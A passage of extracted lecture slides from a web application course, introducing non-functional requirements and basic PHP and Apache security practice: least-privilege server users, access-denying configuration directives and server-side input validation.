introduction to non-functional requirements on a web ... · requirements non-functional...
TRANSCRIPT
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Introduction to Non-FunctionalRequirements on a Web
ApplicationInternet Applications, ID1354
1 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
ContentsNon-Functional Requirements
SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation
PerformanceClient-Side ValidationCachingPersistent Connections
2 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Section
Non-Functional Requirements
Security
Performance
3 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Non-Functional RequirementsI Non-functional requirements are all requirements
that do not concern what the program should do, buthow it should work.
I response time
I availabilityI usabilityI security (authentication, authorization,
integrity, privacy, etc)I and many more.
I Very important to specify non-functionalrequirements before development starts.
I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.
4 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Non-Functional RequirementsI Non-functional requirements are all requirements
that do not concern what the program should do, buthow it should work.
I response timeI availability
I usabilityI security (authentication, authorization,
integrity, privacy, etc)I and many more.
I Very important to specify non-functionalrequirements before development starts.
I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.
4 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Non-Functional RequirementsI Non-functional requirements are all requirements
that do not concern what the program should do, buthow it should work.
I response timeI availabilityI usability
I security (authentication, authorization,integrity, privacy, etc)
I and many more.
I Very important to specify non-functionalrequirements before development starts.
I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.
4 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Non-Functional RequirementsI Non-functional requirements are all requirements
that do not concern what the program should do, buthow it should work.
I response timeI availabilityI usabilityI security (authentication, authorization,
integrity, privacy, etc)
I and many more.
I Very important to specify non-functionalrequirements before development starts.
I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.
4 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Non-Functional RequirementsI Non-functional requirements are all requirements
that do not concern what the program should do, buthow it should work.
I response timeI availabilityI usabilityI security (authentication, authorization,
integrity, privacy, etc)I and many more.
I Very important to specify non-functionalrequirements before development starts.
I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.
4 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Non-Functional RequirementsI Non-functional requirements are all requirements
that do not concern what the program should do, buthow it should work.
I response timeI availabilityI usabilityI security (authentication, authorization,
integrity, privacy, etc)I and many more.
I Very important to specify non-functionalrequirements before development starts.
I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.
4 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Non-Functional RequirementsI Non-functional requirements are all requirements
that do not concern what the program should do, buthow it should work.
I response timeI availabilityI usabilityI security (authentication, authorization,
integrity, privacy, etc)I and many more.
I Very important to specify non-functionalrequirements before development starts.
I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.
4 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Non-Functional RequirementsI Non-functional requirements are all requirements
that do not concern what the program should do, buthow it should work.
I response timeI availabilityI usabilityI security (authentication, authorization,
integrity, privacy, etc)I and many more.
I Very important to specify non-functionalrequirements before development starts.
I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.
4 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Non-Functional Requirements(Cont’d)
I Be realistic when specifying non-functionalrequirements, do not write a wish list.
I It must be possible to verify that therequirements are fulfilled. For example, donot write fast enough, but rather first visiblesign of response within 1 second in 99% ofthe calls measured from outer firewall.
I Now, we will look at two groups ofnon-functional requirements: security andperformance.
5 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Non-Functional Requirements(Cont’d)
I Be realistic when specifying non-functionalrequirements, do not write a wish list.
I It must be possible to verify that therequirements are fulfilled. For example, donot write fast enough, but rather first visiblesign of response within 1 second in 99% ofthe calls measured from outer firewall.
I Now, we will look at two groups ofnon-functional requirements: security andperformance.
5 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Non-Functional Requirements(Cont’d)
I Be realistic when specifying non-functionalrequirements, do not write a wish list.
I It must be possible to verify that therequirements are fulfilled. For example, donot write fast enough, but rather first visiblesign of response within 1 second in 99% ofthe calls measured from outer firewall.
I Now, we will look at two groups ofnon-functional requirements: security andperformance.
5 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Section
Non-Functional Requirements
SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation
Performance
6 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Security
I There are many different aspects ofsecurity.
I Here, we will look at possible flaws thatopens security holes, which may beexploited for attacks. We will also see howto stop these attacks.
I This is only an introduction to web sitesecurity, to illustrate that problems exist andmust be considered.
7 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Security
I There are many different aspects ofsecurity.
I Here, we will look at possible flaws thatopens security holes, which may beexploited for attacks. We will also see howto stop these attacks.
I This is only an introduction to web sitesecurity, to illustrate that problems exist andmust be considered.
7 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Security
I There are many different aspects ofsecurity.
I Here, we will look at possible flaws thatopens security holes, which may beexploited for attacks. We will also see howto stop these attacks.
I This is only an introduction to web sitesecurity, to illustrate that problems exist andmust be considered.
7 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SectionNon-Functional Requirements
SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation
PerformanceClient-Side ValidationCachingPersistent Connections
8 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
File System SecurityI PHP is able to access files, execute
commands and open network connectionson the server.
I This means there are big security holes ifthe PHP interpreter’s access rights are notproperly limited.
I Tools to mitigate this are the web server’suserid, file location, and mechanisms torestrict which files the web server mayaccess.
I This is mainly related to configuration, notprogramming, and is therefore serverdependent.
9 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
File System SecurityI PHP is able to access files, execute
commands and open network connectionson the server.
I This means there are big security holes ifthe PHP interpreter’s access rights are notproperly limited.
I Tools to mitigate this are the web server’suserid, file location, and mechanisms torestrict which files the web server mayaccess.
I This is mainly related to configuration, notprogramming, and is therefore serverdependent.
9 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
File System SecurityI PHP is able to access files, execute
commands and open network connectionson the server.
I This means there are big security holes ifthe PHP interpreter’s access rights are notproperly limited.
I Tools to mitigate this are the web server’suserid, file location, and mechanisms torestrict which files the web server mayaccess.
I This is mainly related to configuration, notprogramming, and is therefore serverdependent.
9 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
File System SecurityI PHP is able to access files, execute
commands and open network connectionson the server.
I This means there are big security holes ifthe PHP interpreter’s access rights are notproperly limited.
I Tools to mitigate this are the web server’suserid, file location, and mechanisms torestrict which files the web server mayaccess.
I This is mainly related to configuration, notprogramming, and is therefore serverdependent.
9 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Web Server UserI We must specify which user the web server shall be
on the local operating system.I To avoid errors related to access rights, it might be
tempting to set the web server’s user id to root oradministrator or another the name of the superuser.
I This is not appropriate!! It allows an attacker (orbugs in our code) to perform any malicious action.
I A good advise is to specify a special dedicated userfor the web server, that is not used by anyone else.This way, we can freely tune access rights for theweb server.
I How to specify user (and group) id is server and OSdependent. On apache/unix, it is specified in theenvvars file, which is normally located in thesame directory as apache2.conf
10 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Web Server UserI We must specify which user the web server shall be
on the local operating system.I To avoid errors related to access rights, it might be
tempting to set the web server’s user id to root oradministrator or another the name of the superuser.
I This is not appropriate!! It allows an attacker (orbugs in our code) to perform any malicious action.
I A good advise is to specify a special dedicated userfor the web server, that is not used by anyone else.This way, we can freely tune access rights for theweb server.
I How to specify user (and group) id is server and OSdependent. On apache/unix, it is specified in theenvvars file, which is normally located in thesame directory as apache2.conf
10 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Web Server UserI We must specify which user the web server shall be
on the local operating system.I To avoid errors related to access rights, it might be
tempting to set the web server’s user id to root oradministrator or another the name of the superuser.
I This is not appropriate!! It allows an attacker (orbugs in our code) to perform any malicious action.
I A good advise is to specify a special dedicated userfor the web server, that is not used by anyone else.This way, we can freely tune access rights for theweb server.
I How to specify user (and group) id is server and OSdependent. On apache/unix, it is specified in theenvvars file, which is normally located in thesame directory as apache2.conf
10 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Web Server UserI We must specify which user the web server shall be
on the local operating system.I To avoid errors related to access rights, it might be
tempting to set the web server’s user id to root oradministrator or another the name of the superuser.
I This is not appropriate!! It allows an attacker (orbugs in our code) to perform any malicious action.
I A good advise is to specify a special dedicated userfor the web server, that is not used by anyone else.This way, we can freely tune access rights for theweb server.
I How to specify user (and group) id is server and OSdependent. On apache/unix, it is specified in theenvvars file, which is normally located in thesame directory as apache2.conf
10 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Web Server UserI We must specify which user the web server shall be
on the local operating system.I To avoid errors related to access rights, it might be
tempting to set the web server’s user id to root oradministrator or another the name of the superuser.
I This is not appropriate!! It allows an attacker (orbugs in our code) to perform any malicious action.
I A good advise is to specify a special dedicated userfor the web server, that is not used by anyone else.This way, we can freely tune access rights for theweb server.
I How to specify user (and group) id is server and OSdependent. On apache/unix, it is specified in theenvvars file, which is normally located in thesame directory as apache2.conf
10 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Apache User On Windows
I On Windows, the apache server normallyruns as the LocalSystem user, whichhas no network privileges but wide filesystem privileges.
I The apache documentation, see https://httpd.apache.org/docs/2.2/platform/windows.html#winsvc,recommends creating a new, dedicateduser for the apache service. This documentalso shows how to do that.
11 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Apache User On Windows
I On Windows, the apache server normallyruns as the LocalSystem user, whichhas no network privileges but wide filesystem privileges.
I The apache documentation, see https://httpd.apache.org/docs/2.2/platform/windows.html#winsvc,recommends creating a new, dedicateduser for the apache service. This documentalso shows how to do that.
11 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
File System AccessI Having restricted the web server to a user
with limited rights, we might get exceptionsbecause the server can not access files itneed.
I Repeatedly facing this problem, we mightbe tempted to release access control andgive all users all rights on the entire website.
I This is not appropriate!! We must, file byfile, decide if the server shall have accessto it. If so, we might set the server user tofile owner.
12 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
File System AccessI Having restricted the web server to a user
with limited rights, we might get exceptionsbecause the server can not access files itneed.
I Repeatedly facing this problem, we mightbe tempted to release access control andgive all users all rights on the entire website.
I This is not appropriate!! We must, file byfile, decide if the server shall have accessto it. If so, we might set the server user tofile owner.
12 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
File System AccessI Having restricted the web server to a user
with limited rights, we might get exceptionsbecause the server can not access files itneed.
I Repeatedly facing this problem, we mightbe tempted to release access control andgive all users all rights on the entire website.
I This is not appropriate!! We must, file byfile, decide if the server shall have accessto it. If so, we might set the server user tofile owner.
12 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit HTTP AccessI Sometimes it shall be possible to read or include a
file in PHP code, but not to retrieve the file with aHTTP GET request.
I This situation can not be solved by limiting filesystem access. Instead, we have to specify in theserver’s configuration files what it is allowed to do.
I With apache, application specific configuration isdone with a .htaccess file. The content of such afile is valid for the directory where the file is located,and all subdirectories.
I The following entry forbids HTTP access to the fileconversation.txt, where the conversation isstored in the sample chat application.
1 <FilesMatch "conversation.txt">2 Order allow,deny3 Deny from all4 </FilesMatch>
13 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit HTTP AccessI Sometimes it shall be possible to read or include a
file in PHP code, but not to retrieve the file with aHTTP GET request.
I This situation can not be solved by limiting filesystem access. Instead, we have to specify in theserver’s configuration files what it is allowed to do.
I With apache, application specific configuration isdone with a .htaccess file. The content of such afile is valid for the directory where the file is located,and all subdirectories.
I The following entry forbids HTTP access to the fileconversation.txt, where the conversation isstored in the sample chat application.
1 <FilesMatch "conversation.txt">2 Order allow,deny3 Deny from all4 </FilesMatch>
13 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit HTTP AccessI Sometimes it shall be possible to read or include a
file in PHP code, but not to retrieve the file with aHTTP GET request.
I This situation can not be solved by limiting filesystem access. Instead, we have to specify in theserver’s configuration files what it is allowed to do.
I With apache, application specific configuration isdone with a .htaccess file. The content of such afile is valid for the directory where the file is located,and all subdirectories.
I The following entry forbids HTTP access to the fileconversation.txt, where the conversation isstored in the sample chat application.
1 <FilesMatch "conversation.txt">2 Order allow,deny3 Deny from all4 </FilesMatch>
13 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit HTTP AccessI Sometimes it shall be possible to read or include a
file in PHP code, but not to retrieve the file with aHTTP GET request.
I This situation can not be solved by limiting filesystem access. Instead, we have to specify in theserver’s configuration files what it is allowed to do.
I With apache, application specific configuration isdone with a .htaccess file. The content of such afile is valid for the directory where the file is located,and all subdirectories.
I The following entry forbids HTTP access to the fileconversation.txt, where the conversation isstored in the sample chat application.
1 <FilesMatch "conversation.txt">2 Order allow,deny3 Deny from all4 </FilesMatch>
13 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit HTTP Access (Cont’d)
I We might want to prohibit HTTP access toan entire directory, not just a file. Directorydirectives must be placed in the apacheconfiguration file, apache2.conf.
I It is a good idea to prohibit access to allPHP classes. It should only be possible todirect HTTP requests to files intended to beaccessed via HTTP.
14 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit HTTP Access (Cont’d)
I We might want to prohibit HTTP access toan entire directory, not just a file. Directorydirectives must be placed in the apacheconfiguration file, apache2.conf.
I It is a good idea to prohibit access to allPHP classes. It should only be possible todirect HTTP requests to files intended to beaccessed via HTTP.
14 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit HTTP Access (Cont’d)I This can be achieved by placing PHP classes in aclasses directory and specifying the followingentry in apache2.conf.
1 <Directory "/var/www/doc-root/*/classes">2 <Files *>3 Order allow,deny4 Deny from all5 </Files>6 </Directory>
I This applies to all files with a path matching/var/www/doc-root/*/classes/*. Itprohibits access to PHP classes if the web server’sroot directory is /var/www/doc-root and allPHP classes are placed in a classes directory inthe web application root.
15 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit HTTP Access (Cont’d)I This can be achieved by placing PHP classes in aclasses directory and specifying the followingentry in apache2.conf.
1 <Directory "/var/www/doc-root/*/classes">2 <Files *>3 Order allow,deny4 Deny from all5 </Files>6 </Directory>
I This applies to all files with a path matching/var/www/doc-root/*/classes/*. Itprohibits access to PHP classes if the web server’sroot directory is /var/www/doc-root and allPHP classes are placed in a classes directory inthe web application root.
15 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SectionNon-Functional Requirements
SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation
PerformanceClient-Side ValidationCachingPersistent Connections
16 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Input FilteringI Never trust anything coming from the client,
there is no such thing as client-sidesecurity. This is very important and solvesmany security problems.
I Do not assume that data, e.g., HTTPparameters, comes from your client code. Itcould come from an attacker.
I It is still appropriate to use client-side datavalidation to improve performance forordinary execution, i.e., no attacks.Client-side validation is faster since norequest is sent to server.
17 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Input FilteringI Never trust anything coming from the client,
there is no such thing as client-sidesecurity. This is very important and solvesmany security problems.
I Do not assume that data, e.g., HTTPparameters, comes from your client code. Itcould come from an attacker.
I It is still appropriate to use client-side datavalidation to improve performance forordinary execution, i.e., no attacks.Client-side validation is faster since norequest is sent to server.
17 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Input FilteringI Never trust anything coming from the client,
there is no such thing as client-sidesecurity. This is very important and solvesmany security problems.
I Do not assume that data, e.g., HTTPparameters, comes from your client code. Itcould come from an attacker.
I It is still appropriate to use client-side datavalidation to improve performance forordinary execution, i.e., no attacks.Client-side validation is faster since norequest is sent to server.
17 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validate Parameters
I Therefore, server-side validation isnecessary, whether there is client-sidevalidation or not. Normally, both are used.
I To be strict, all methods should alwaysvalidate all parameters.
I This not only improves security, but alsoreduces the risk of corrupt data, makes iteasier to find bugs and facilitates errorhandling.
18 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validate Parameters
I Therefore, server-side validation isnecessary, whether there is client-sidevalidation or not. Normally, both are used.
I To be strict, all methods should alwaysvalidate all parameters.
I This not only improves security, but alsoreduces the risk of corrupt data, makes iteasier to find bugs and facilitates errorhandling.
18 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validate Parameters
I Therefore, server-side validation isnecessary, whether there is client-sidevalidation or not. Normally, both are used.
I To be strict, all methods should alwaysvalidate all parameters.
I This not only improves security, but alsoreduces the risk of corrupt data, makes iteasier to find bugs and facilitates errorhandling.
18 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validating a Numeric ValueI HTTP is string based, all data from the client will be
of the string type in server code.I Parameters supposed to contain numbers must be
checked to see that the content really is a number,the following code shows how to validate an integer.
1 if (!empty($_GET[’someParam’])) {2 $someParam = (int) $_GET[’someParam’];3 } else {4 $someParam = 0;5 }
I The empty function on line one returns true if theargument does not exist or equals FALSE.Remember that “”, “0” and 0 equals FALSE.
I The cast (int) on line two converts the argumentto an integer. If the string starts with valid numericdata, this will be the value used. Otherwise, thevalue will be zero.
19 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validating a Numeric ValueI HTTP is string based, all data from the client will be
of the string type in server code.I Parameters supposed to contain numbers must be
checked to see that the content really is a number,the following code shows how to validate an integer.
1 if (!empty($_GET[’someParam’])) {2 $someParam = (int) $_GET[’someParam’];3 } else {4 $someParam = 0;5 }
I The empty function on line one returns true if theargument does not exist or equals FALSE.Remember that “”, “0” and 0 equals FALSE.
I The cast (int) on line two converts the argumentto an integer. If the string starts with valid numericdata, this will be the value used. Otherwise, thevalue will be zero.
19 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validating a Numeric ValueI HTTP is string based, all data from the client will be
of the string type in server code.I Parameters supposed to contain numbers must be
checked to see that the content really is a number,the following code shows how to validate an integer.
1 if (!empty($_GET[’someParam’])) {2 $someParam = (int) $_GET[’someParam’];3 } else {4 $someParam = 0;5 }
I The empty function on line one returns true if theargument does not exist or equals FALSE.Remember that “”, “0” and 0 equals FALSE.
I The cast (int) on line two converts the argumentto an integer. If the string starts with valid numericdata, this will be the value used. Otherwise, thevalue will be zero.
19 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validating a Numeric ValueI HTTP is string based, all data from the client will be
of the string type in server code.I Parameters supposed to contain numbers must be
checked to see that the content really is a number,the following code shows how to validate an integer.
1 if (!empty($_GET[’someParam’])) {2 $someParam = (int) $_GET[’someParam’];3 } else {4 $someParam = 0;5 }
I The empty function on line one returns true if theargument does not exist or equals FALSE.Remember that “”, “0” and 0 equals FALSE.
I The cast (int) on line two converts the argumentto an integer. If the string starts with valid numericdata, this will be the value used. Otherwise, thevalue will be zero.
19 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validating a Numeric Value(Cont’d)
I To access POST data, use _POST insteadof _GET.
I To validate a float parameter, use(float) instead of (int) for casting.
I There are many more casts available forother PHP types, for example (double)and (boolean).
20 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validating a Numeric Value(Cont’d)
I To access POST data, use _POST insteadof _GET.
I To validate a float parameter, use(float) instead of (int) for casting.
I There are many more casts available forother PHP types, for example (double)and (boolean).
20 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validating a Numeric Value(Cont’d)
I To access POST data, use _POST insteadof _GET.
I To validate a float parameter, use(float) instead of (int) for casting.
I There are many more casts available forother PHP types, for example (double)and (boolean).
20 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validating a String
I There are many ctype_ functions the canbe used to check the content of a string, forexample:
I ctype_alpha($str) is true if theargument contains only letters.
I ctype_alnum($str) is true if theargument contains only letters or digits.
I ctype_print($str) is true if theargument contains only characters thatproduce output, i.e., no control characters.
I Also use the empty function to check if theparameter is set, as when validating anumber.
21 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Validating a String
I There are many ctype_ functions the canbe used to check the content of a string, forexample:
I ctype_alpha($str) is true if theargument contains only letters.
I ctype_alnum($str) is true if theargument contains only letters or digits.
I ctype_print($str) is true if theargument contains only characters thatproduce output, i.e., no control characters.
I Also use the empty function to check if theparameter is set, as when validating anumber.
21 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
